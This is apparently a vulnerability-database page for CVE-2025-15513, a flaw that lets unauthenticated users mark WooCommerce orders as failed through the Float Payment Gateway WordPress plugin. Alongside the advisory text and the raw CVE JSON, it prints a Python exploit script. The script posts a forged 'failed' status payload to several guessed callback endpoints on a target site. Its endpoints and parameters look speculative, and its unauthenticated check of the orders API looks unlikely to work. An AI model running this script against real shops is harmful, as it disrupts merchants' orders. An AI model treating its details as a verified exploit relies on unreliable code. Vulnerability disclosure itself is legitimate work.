Security Vulnerability Report
中文
CVE-2025-15513 CVSS 5.3 MEDIUM

CVE-2025-15513

Published: 2026-01-14 07:16:14
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Float Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to improper error handling in the verifyFloatResponse() function in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to mark any WooCommerce order as failed.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Float Payment Gateway插件 所有版本 <= 1.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-15513 PoC - WordPress Float Payment Gateway Unauthenticated Order Status Manipulation # This PoC demonstrates how an unauthenticated attacker can mark any WooCommerce order as failed import requests import sys def exploit_float_gateway(target_url, order_id): """ Exploit for CVE-2025-15513: Float Payment Gateway plugin for WordPress Unauthenticated order status manipulation via improper error handling in verifyFloatResponse() Parameters: target_url: Base URL of the WordPress site order_id: Target WooCommerce order ID to mark as failed """ # Target the payment gateway callback endpoint # The vulnerable function verifyFloatResponse() is called via this endpoint endpoints = [ f"{target_url}/?wc-api=wc_float_gateway", f"{target_url}/wc-api/wc_float_gateway/", f"{target_url}/wp-json/wc-float-gateway/v1/verify" ] # Malicious payload to trigger improper error handling # This causes the function to mark the order as failed without proper validation malicious_payload = { 'order_id': order_id, 'status': 'failed', 'transaction_id': 'MALICIOUS_' + str(order_id), 'error_code': 'verification_failed', 'float_response': 'error' } print(f"[*] Target: {target_url}") print(f"[*] Target Order ID: {order_id}") print(f"[*] CVE-2025-15513 Exploitation Attempt") print("-" * 50) for endpoint in endpoints: try: print(f"\n[*] Trying endpoint: {endpoint}") # Send the malicious request response = requests.post(endpoint, data=malicious_payload, timeout=10) # Check if the order status was modified if response.status_code == 200: print(f"[+] Request sent to {endpoint}") print(f"[+] Response Status Code: {response.status_code}") # Verify the order status change verify_url = f"{target_url}/wp-json/wc/v3/orders/{order_id}" verify_resp = requests.get(verify_url) if 'failed' in verify_resp.text.lower(): print(f"[!] VULNERABLE: Order {order_id} has been marked as failed!") return True else: print(f"[-] Endpoint returned status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error connecting to {endpoint}: {str(e)}") continue print("\n[*] Exploitation completed. Check WooCommerce order status manually.") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-15513.py <target_url> <order_id>") print("Example: python cve-2025-15513.py https://example.com 12345") sys.exit(1) target = sys.argv[1] order_id = sys.argv[2] exploit_float_gateway(target, order_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15513", "sourceIdentifier": "[email protected]", "published": "2026-01-14T07:16:14.433", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Float Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to improper error handling in the verifyFloatResponse() function in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to mark any WooCommerce order as failed."}, {"lang": "es", "value": "El plugin Float Payment Gateway para WordPress es vulnerable a la modificación no autorizada de datos debido a un manejo inadecuado de errores en la función verifyFloatResponse() en todas las versiones hasta la 1.1.9, inclusive. Esto permite a atacantes no autenticados marcar cualquier pedido de WooCommerce como fallido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/float-gateway/tags/1.1.9/index.php#L477", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3444078%40float-gateway&new=3444078%40float-gateway&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2c7fb39-d128-4285-8bc3-1e192e1e1196?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.